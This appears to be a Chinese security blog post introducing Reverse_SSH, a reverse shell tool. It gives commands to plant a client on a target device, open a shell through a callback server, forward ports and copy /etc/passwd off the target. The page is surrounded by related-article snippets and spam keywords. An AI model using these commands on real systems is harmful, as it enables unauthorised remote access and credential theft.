<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一款基于SSH的反向Shell工具

    VSole2023-10-16 13:48:05

    0x01 工具介紹

    Reverse_SSH上一款基于SSH的反向Shell工具,在該工具的幫助下,廣大研究人員可以使用SSH來實現反向Shell。

    0x02 安裝與使用

    1、 安裝

    git clone https://github.com/NHAS/reverse_sshcd reverse_sshmakecd bin/
    

    2、開啟服務端

    cp ~/.ssh/id_ed25519.pub authorized_keys./server 0.0.0.0:3232
    

    3、 將客戶端拷貝到目標設備中,然后讓客戶端連接服務器:

    ./client your.rssh.server.com:3233
    

    4、獲取工具幫助信息:

    ssh your.rssh.server.com -p 3232 help
    

    5、查看客戶端:

    ssh your.rssh.server.com -p 3232 ls -t
    

    6、連接到完整Shell:

    ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac
    

    7、或直接使用主機名連接:

    ssh -J your.rssh.server.com:3232 root.wombo
    

    8、接下來,可以開啟遠程轉發功能:

    ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo
    

    9、或開啟動態轉發:

    ssh -D 9050 -J your.rssh.server.com:3232 root.wombo
    

     10、SCP:

    scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
    

    11、SFTP:

    sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
    

    0x03 項目鏈接下載

    https://github.com/NHAS/reverse_ssh

    shellssh
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    此時,如果你使用的是Linux系統,可以使用mingw-w64-gcc編譯器:CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll. 當RSSH服務器啟用了Webserver之后,我們也可以使用下列命令進行編譯:./server --webserver :3232. 這種情況適用于無文件注入的場景。WebhookRSSH服務器可以通過命令行終端接口并使用webhook命令發送原始HTTP請求。
    Reverse_SSH上一款基于SSH的反向Shell工具,在該工具的幫助下,廣大研究人員可以使用SSH來實現反向Shell
    一個新發現的規避惡意軟件利用Secure Shell加密協議進入目標系統,目的是挖掘加密貨幣并實施分布式拒絕服務攻擊。
    如果被利用,該漏洞可能允許攻擊者劫持設備的攝像頭和麥克風以監視房主。 安全實驗室 Modux 的研究人員發現了 Enabot 的 Ebo Air 智能機器人的一個缺陷,該機器人旨在娛樂您的整個家庭和寵物。根據 Modux 研究人員的發現,攻擊者可以通過利用該漏洞并監視居住者/用戶來輕松入侵智能機器人。
    安全研究人員觀察到名為 TellYouThePass 的勒索軟件家族嘗試利用最近發現的 Log4j 高危漏洞。TellYouThePass 勒索軟件家族被認為年代比較悠久且基本不活躍,在廣泛使用的 Log4j 日志框架發現漏洞之后,該勒索軟件家族再次活躍。研究人員表示,繼 Khonsari 勒索軟件之后,TellYouThePass 成為第二個被觀察到利用 Log4j 漏洞(被稱為Log4Shel
    網絡交換機充當網絡的構建模塊,促進了局域網(LAN)內的數據流。
    ESXI環境搭建和配置
    2022-05-09 13:32:39
    ESXI環境搭建和配置
    近日,負責提供安全數字化體驗的智能邊緣平臺阿卡邁技術公司(Akamai Technologies)推出了可防范網絡釣魚的全新解決方案Akamai MFA,旨在使企業能夠快速部署FIDO2多因素身份驗證(MFA),而無需部署和管理硬件安全密鑰。Akamai MFA使用智能手機應用程序將現有智能手機轉變為硬件安全密鑰,進而實現流暢的用戶體驗。
    要說哪個網絡威脅組織同時具備狡猾的社會工程學能力和靈活的網絡安全技術,那就不得不提到Muddled Libra了。由于對企業信息技術有著深入的了解,即使你的組織機構擁有完善的傳統網絡防御系統,Muddled Libra也會對你產生巨大的威脅。
    2021 年,全球因勒索軟件造成的損失預計達到 200 億美元,遠高于 2015 年的 3.25 億美元。惡意流量按照攻擊行為可歸納為以下 3 種類型。攻擊行為包括掃描探測、暴力破解等。相比按照惡意流量攻擊行為劃分,學術界更側重于根據惡意流量的內容特征、數據流特征及網絡連接行為特征等具體特征進行劃分。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类